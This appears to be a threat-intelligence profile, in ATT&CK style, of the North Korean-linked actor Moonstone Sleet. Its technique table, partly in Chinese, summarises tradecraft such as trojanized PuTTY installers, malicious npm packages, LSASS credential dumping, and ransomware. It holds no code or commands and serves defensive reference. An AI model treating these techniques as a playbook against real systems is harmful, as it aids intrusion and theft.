Moonstone Sleet
Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.[1]
Associated Group Descriptions
| Name | Description |
|---|---|
| Storm-1789 |
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1195 | .002 | 供应链破坏: Compromise Software Supply Chain |
Moonstone Sleet has distributed a trojanized version of PuTTY software for initial access to victims.[1] |
| Enterprise | T1598 | 信息钓鱼 |
Moonstone Sleet has interacted with victims to gather information via email.[1] |
|
| .003 | Spearphishing Link |
Moonstone Sleet used spearphishing messages containing items such as tracking pixels to determine if users interacted with malicious messages.[1] |
||
| Enterprise | T1140 | 反混淆/解码文件或信息 |
Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis.[1] |
|
| Enterprise | T1547 | .001 | 启动或登录自动启动执行: Registry Run Keys / Startup Folder |
Moonstone Sleet used registry run keys for process execution during initial victim infection.[1] |
| Enterprise | T1071 | .001 | 应用层协议: Web Protocols |
Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.[1] |
| Enterprise | T1585 | .001 | 建立账户: Social Media Accounts |
Moonstone Sleet has created social media accounts to interact with victims.[1] |
| .002 | 建立账户: Email Accounts |
Moonstone Sleet has created email accounts to interact with victims, including for phishing purposes.[1] |
||
| Enterprise | T1587 | 开发能力 |
Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.[1] |
|
| .001 | Malware |
Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.[1] |
||
| Enterprise | T1003 | .001 | 操作系统凭证转储: LSASS Memory |
Moonstone Sleet retrieved credentials from LSASS memory.[1] |
| Enterprise | T1591 | 收集受害者组织信息 |
Moonstone Sleet has gathered information on victim organizations through email and social media interaction.[1] |
|
| Enterprise | T1589 | .002 | 收集受害者身份信息: Email Addresses |
Moonstone Sleet gathered victim email address information for follow-on phishing activity.[1] |
| Enterprise | T1486 | 数据加密以实现影响 |
Moonstone Sleet has deployed ransomware in victim environments.[1] |
|
| Enterprise | T1608 | .001 | 暂存能力: Upload Malware |
Moonstone Sleet staged malicious capabilities online for follow-on download by victims or malware.[1] |
| Enterprise | T1217 | 浏览器信息发现 |
Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information.[1] |
|
| Enterprise | T1027 | 混淆文件或信息 |
Moonstone Sleet delivers encrypted payloads in pieces that are then combined together to form a new portable executable (PE) file during installation.[1] |
|
| .009 | Embedded Payloads |
Moonstone Sleet embedded payloads in trojanized software for follow-on execution.[1] |
||
| .013 | Encrypted/Encoded File |
Moonstone Sleet has used encrypted payloads within files for follow-on execution and defense evasion.[1] |
||
| Enterprise | T1204 | .002 | 用户执行: Malicious File |
Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.[1] |
| Enterprise | T1082 | 系统信息发现 |
Moonstone Sleet has gathered information on victim systems.[1] |
|
| Enterprise | T1033 | 系统所有者/用户发现 |
Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions.[1] |
|
| Enterprise | T1569 | .002 | 系统服务: Service Execution |
Moonstone Sleet used intermediate loader malware such as YouieLoader and SplitLoader that create malicious services.[1] |
| Enterprise | T1016 | 系统网络配置发现 |
Moonstone Sleet has gathered information on victim network configuration.[1] |
|
| Enterprise | T1583 | .001 | 获取基础设施: Domains |
Moonstone Sleet registered domains to develop effective personas for fake companies used in phishing activity.[1] |
| .003 | 获取基础设施: Virtual Private Server |
Moonstone Sleet registered virtual private servers to host payloads for download.[1] |
||
| Enterprise | T1105 | 输入工具传输 |
Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems.[1] |
|
| Enterprise | T1566 | .001 | 钓鱼: Spearphishing Attachment |
Moonstone Sleet delivered various payloads to victims as spearphishing attachments.[1] |
| .003 | 钓鱼: Spearphishing via Service |
Moonstone Sleet has used social media services to spear phish victims to deliver trojainized software.[1] |
||
| Enterprise | T1053 | .005 | 预定任务/作业: Scheduled Task |
Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.[1] |